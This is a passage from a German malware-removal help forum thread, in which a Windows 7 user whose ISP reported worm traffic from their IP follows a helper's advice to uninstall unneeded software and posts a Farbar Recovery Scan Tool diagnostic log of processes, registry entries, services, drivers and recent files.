|
Log-Analyse und Auswertung: UPC meldet: Virus, würmer werden über meine IP versendetWindows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML. |
04.08.2017, 18:23 | #16 |
| UPC meldet: Virus, würmer werden über meine IP versendet *up* |
04.08.2017, 22:17 | #17 |
/// Winkelfunktion /// TB-Süch-Tiger™ | UPC meldet: Virus, würmer werden über meine IP versendet Da muss aber einiges an Schrott runter. Tw. alte Versionen, ein andere Teil seghr viel unbrauchbarer Schrott, u.a. auch Avira. Hau das alles weg. Alternativen werden genannt wenn wir hier durch sind.
__________________Gib Bescheid wenn Avira weg ist; wenn wir hier durch sind, kannst du auf einen anderen Virenscanner umsteigen, Infos folgen dann im Abschlussposting. Bitte JETZT nix mehr ohne Absprache installieren! Lade Dir bitte von hier Revo Uninstaller (alternativ portable Revo Uninstaller) herunter.
__________________ |
06.08.2017, 00:27 | #18 |
| UPC meldet: Virus, würmer werden über meine IP versendet Alles klar. habe die genannten Programme deinstalliert.
__________________Mit dem Deinstaller ist mir aufgefallen dass ich noch viele andere unnötige bzw nicht mehr verwendetet Programme drauf hatte. Also diese grad auch deinstalliert. Hier die neuen Logs falls gebraucht. Sollten jetzt auch übersichtlicher sein nach dem aufräumen. Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 31-07-2017 durchgeführt von **** (Administrator) auf SILENTDRAGON (06-08-2017 01:14:07) Gestartet von C:\Users\****\Desktop Geladene Profile: **** (Verfügbare Profile: ****) Platform: Windows 7 Ultimate (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 11 (Standard-Browser: Chrome) Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe (Electronic Arts) G:\Program Files (x86)\Origin\OriginWebHelperService.exe (Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe (Microsoft Corporation) C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe (Microsoft Corporation) C:\Windows\System32\smartscreen.exe () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeHost.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe (Logitech, Inc.) C:\Program Files\Common Files\logishrd\KHAL3\KHALMNPR.exe (Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe (TomTom) C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe (Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe (Valve Corporation) G:\Program Files (x86)\Steam\Steam.exe (Dropbox, Inc.) C:\Users\****\AppData\Local\Dropbox\Update\DropboxUpdate.exe (Wargaming.net) G:\Games\World_of_Warships\WargamingGameUpdater.exe (Akamai Technologies, Inc.) C:\Users\****\AppData\Local\Akamai\netsession_win.exe (Akamai Technologies, Inc.) C:\Users\****\AppData\Local\Akamai\netsession_win.exe (Google, Inc) C:\Users\****\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe (Spotify Ltd) C:\Users\****\AppData\Roaming\Spotify\SpotifyWebHelper.exe () C:\Program Files\Qualcomm Atheros\Network Manager\NetworkManager.exe (Logitech Inc.) C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe (Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (Valve Corporation) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe (Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (NVIDIA Corporation) C:\Users\****\AppData\Local\NVIDIA\NvBackend\ApplicationOntology\NvOAWrapperCache.exe (Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe (Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe (Qualcomm Atheros) C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Skype Technologies) C:\Program Files (x86)\Skype\Updater\Updater.exe (IObit) C:\Program Files (x86)\IObit\Classic Start\SMService.exe (IObit) C:\Program Files (x86)\IObit\Classic Start\ClassicStart.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (IObit) C:\Program Files (x86)\IObit\Classic Start\StartMenu_Hook.exe (IObit) C:\Program Files (x86)\IObit\Classic Start\InstallServices.exe (DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe ==================== Registry (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9197568 2017-05-15] (Realtek Semiconductor) HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2014-05-28] (Intel Corporation) HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-26] (Logitech, Inc.) HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [17406072 2017-01-24] (Logitech Inc.) HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [204136 2012-09-13] (Logitech Inc.) HKLM-x32\...\Run: [KiesTrayAgent] => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe [318128 2016-11-16] (Samsung Electronics Co., Ltd.) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-07-21] (Oracle Corporation) HKLM-x32\...\Winlogon: [Userinit] Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.) HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9818328 2017-06-30] (Piriform Ltd) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [MyDriveConnect.exe] => C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe [1918696 2017-05-08] (TomTom) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Steam] => G:\Program Files (x86)\Steam\steam.exe [3062560 2017-07-18] (Valve Corporation) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Google Update] => C:\Users\****\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateCore.exe [601168 2017-04-27] (Google Inc.) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [BingSvc] => C:\Users\****\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Dropbox Update] => C:\Users\****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-05] (Dropbox, Inc.) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [World of Warships] => G:\Games\World_of_Warships\WargamingGameUpdater.exe [3136264 2017-06-02] (Wargaming.net) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Akamai NetSession Interface] => C:\Users\****\AppData\Local\Akamai\netsession_win.exe [4490200 2017-01-03] (Akamai Technologies, Inc.) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Google Photos Backup] => C:\Users\****\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe [3790936 2016-04-09] (Google, Inc) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Spotify Web Helper] => C:\Users\****\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-04-19] (Spotify Ltd) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Killer Network Manager.lnk [2015-02-03] ShortcutTarget: Killer Network Manager.lnk -> C:\Windows\Installer\{A32F7F52-0DC5-40EF-84BD-7D30CC20D157}\NetworkManager.exe_130C27D738F34C89BDDF21BCFD74B56D.exe (Flexera Software LLC) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\simplicheck.lnk [2017-05-06] ShortcutTarget: simplicheck.lnk -> C:\Program Files (x86)\simplitec\simplicheck\simplicheck.exe (Keine Datei) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\UE Music Library-Taskleisten-Tool.lnk [2016-05-04] ShortcutTarget: UE Music Library-Taskleisten-Tool.lnk -> C:\Program Files (x86)\Logitech\UE Music Library\UEMLTray.exe (Keine Datei) Startup: C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2017-08-05] ShortcutTarget: Dropbox.lnk -> C:\Users\****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.) ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) Tcpip\Parameters: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60 Tcpip\..\Interfaces\{f81baef3-2886-44c5-9a55-1cfe2ed39eeb}: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60 ManualProxies: Internet Explorer: ================== HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q= HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/ HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.ch/ SearchScopes: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = BHO: Kein Name -> {AF949550-9094-4807-95EC-D1C317803333} -> Keine Datei BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\ssv.dll [2017-08-06] (Oracle Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-06] (Oracle Corporation) FireFox: ======== FF ProfilePath: C:\Users\****\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default [2017-08-06] FF Extension: (Avira Browser Safety) - C:\Users\****\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01] FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2016-08-08] [ist nicht signiert] FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-09-03] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-09-03] (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-06] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-06] (Oracle Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-07-19] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-07-19] (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.) FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=3 -> C:\Users\****\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.) FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=9 -> C:\Users\****\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.) FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin -> C:\Users\****\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi.dll [2016-12-08] (Skype Technologies S.A.) FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin64 -> C:\Users\****\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi-x64.dll [2016-12-08] (Skype Technologies S.A.) Chrome: ======= CHR HomePage: Default -> msn.com CHR StartupUrls: Default -> "hxxps://www.google.ch/" CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms} CHR DefaultSearchKeyword: Default -> bing.com CHR DefaultSuggestURL: Default -> hxxp://www.bing.com/osjson.aspx?FORM=__PARAM__DF&PC=__PARAM__&query={searchTerms} CHR Profile: C:\Users\****\AppData\Local\Google\Chrome\User Data\Default [2017-08-06] CHR Extension: (Google*Übersetzer) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-08-01] CHR Extension: (Google Präsentationen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-08-01] CHR Extension: (Google Docs) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-08-01] CHR Extension: (Google Drive) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-08-01] CHR Extension: (YouTube) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-08-01] CHR Extension: (Bing) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2017-08-01] CHR Extension: (Google Tabellen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-08-01] CHR Extension: (Google Docs Offline) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-08-01] CHR Extension: (Testen Sie Ihre Internet-Geschwindigkeit) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\hekhmbhledgahgpondpnaeaffoipehch [2017-08-01] CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-01] CHR Extension: (Deutsch Übersetzer) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohiojbnhbaoegegaajagfiekffejejih [2017-08-01] CHR Extension: (YouTube™ Flash-HTML5) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\omimccinlhlkpjaeaocglgmkbelejlhj [2017-08-01] CHR Extension: (Google Mail) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-08-01] CHR Extension: (Chrome Media Router) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-01] CHR Extension: (Skype-Anrufe) - C:\Users\****\AppData\Local\Google\Chrome\User Data\Default\Extensions\poghlonenmjdkfghdpfomojhhfggildk [2017-08-01] CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx ==================== Dienste (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [305664 2014-08-11] (Qualcomm Atheros) [Datei ist nicht signiert] S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1465352 2017-01-15] () S3 GalaxyClientService; C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe [487488 2017-07-31] (GOG.com) S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [8163392 2017-07-15] (GOG.com) S3 HiPatchService; G:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios) [Datei ist nicht signiert] R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-05-28] (Intel Corporation) S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-13] (Intel(R) Corporation) R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2014-09-03] (Intel Corporation) S3 iumsvc; C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [178312 2015-09-26] (Intel Corporation) S3 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [154584 2014-09-03] (Intel Corporation) R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [225400 2017-04-06] (Logitech Inc.) R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation) R3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation) R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-07-19] (NVIDIA Corporation) R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [449984 2017-07-26] (NVIDIA Corporation) S3 Origin Client Service; G:\Program Files (x86)\Origin\OriginClientService.exe [2169696 2017-07-11] (Electronic Arts) R2 Origin Web Helper Service; G:\Program Files (x86)\Origin\OriginWebHelperService.exe [3149672 2017-07-11] (Electronic Arts) S4 PDF Architect 5 Manager; C:\ProgramData\pdfforge\PDF Architect 5 Manager\PDF Architect 5\Architect Manager.exe [985904 2017-02-01] (© pdfforge GmbH.) R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [217736 2017-02-23] (Geek Software GmbH) R2 Qualcomm Atheros Killer Service V2; C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe [387584 2014-09-19] (Qualcomm Atheros) [Datei ist nicht signiert] R2 SMService; C:\Program Files (x86)\IObit\Classic Start\SMService.exe [1066272 2016-11-15] (IObit) R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.) R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation) R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-06-20] (Microsoft Corporation) S2 DigitalWave.Update.Service; "C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe" [X] ===================== Treiber (Nicht auf der Ausnahmeliste) ====================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R3 AVerPL33_x64; C:\WINDOWS\system32\DRIVERS\AVerPL33_x64.sys [1780992 2014-07-16] (AVerMedia TECHNOLOGIES, Inc.) S3 bcmsmbsp; C:\WINDOWS\System32\drivers\bcmsmbsp.sys [41176 2015-08-22] (Broadcom Corporation.) S1 BfLwf; C:\WINDOWS\system32\DRIVERS\bwcW8x64.sys [97968 2014-09-11] (Qualcomm Atheros, Inc.) S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.) R3 ETDSMBus; C:\WINDOWS\System32\drivers\ETDSMBus.sys [32840 2017-07-16] (ELAN Microelectronic Corp.) R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [26528 2015-03-15] (REALiX(tm)) S3 Ke2200; C:\WINDOWS\System32\drivers\e22w8x64.sys [130224 2014-03-27] (Qualcomm Atheros, Inc.) R3 KillerEth; C:\WINDOWS\System32\drivers\e2xw10x64.sys [145920 2017-03-18] (Qualcomm Atheros, Inc.) R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech) R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2017-01-24] (Logitech Inc.) R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_24ddebfb518b5a55\nvlddmkm.sys [15668664 2017-07-19] (NVIDIA Corporation) R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-07-26] (NVIDIA Corporation) R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48064 2017-07-26] (NVIDIA Corporation) R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-07-19] (NVIDIA Corporation) R3 SaiMini; C:\WINDOWS\System32\drivers\SaiMini.sys [23968 2016-08-06] (Saitek) R3 SaiNtBus; C:\WINDOWS\system32\drivers\SaiBus.sys [51488 2016-08-06] (Saitek) S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] () S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [164992 2016-07-22] (Samsung Electronics Co., Ltd.) S3 USBADVAU; C:\WINDOWS\system32\drivers\cm11264.sys [4135936 2013-11-01] (C-Media Electronics Inc) [Datei ist nicht signiert] S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation) R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation) R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation) ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2017-08-06 01:08 - 2017-08-06 01:08 - 001160480 _____ (Uniblue Systems Limited ) C:\Users\****\Downloads\pcmechanicpm.exe 2017-08-06 00:28 - 2017-08-06 00:28 - 000097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll 2017-08-05 23:13 - 2017-08-05 23:13 - 000003064 _____ C:\WINDOWS\System32\Tasks\Driver Booster SkipUAC (****) 2017-08-05 22:57 - 2017-08-05 22:57 - 000000927 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk 2017-08-05 22:57 - 2017-08-05 22:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller 2017-08-05 00:32 - 2017-08-05 00:32 - 000000000 ____D C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox 2017-08-04 22:53 - 2017-08-05 02:38 - 000000000 ____D C:\Users\****\.junique 2017-08-04 22:53 - 2017-08-04 22:55 - 000000000 ____D C:\Users\****\.minion 2017-08-04 22:53 - 2017-08-04 22:53 - 000000000 ____D C:\Users\****\AppData\Roaming\gg.minion.Minion 2017-08-04 22:53 - 2017-08-04 22:53 - 000000000 ____D C:\Users\****\.oracle_jre_usage 2017-08-04 22:52 - 2017-08-04 22:52 - 052825304 _____ (Good Game Mods LLC ) C:\Users\****\Desktop\Minion3.0.5.exe 2017-08-04 22:52 - 2017-08-04 22:52 - 000000664 _____ C:\Users\****\Documents\Minion.lnk 2017-08-04 22:52 - 2017-08-04 22:52 - 000000000 ____D C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Good Game Mods LLC 2017-08-01 15:04 - 2017-08-01 15:36 - 000122733 _____ C:\Users\****\Desktop\Addition.txt 2017-08-01 15:01 - 2017-08-06 01:14 - 000024036 _____ C:\Users\****\Desktop\FRST.txt 2017-08-01 12:17 - 2017-08-03 22:03 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable) 2017-08-01 12:17 - 2017-08-01 12:40 - 000192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2017-08-01 12:17 - 2017-08-01 12:32 - 000000000 ____D C:\Users\****\AppData\Local\Nybgy 2017-08-01 12:17 - 2017-08-01 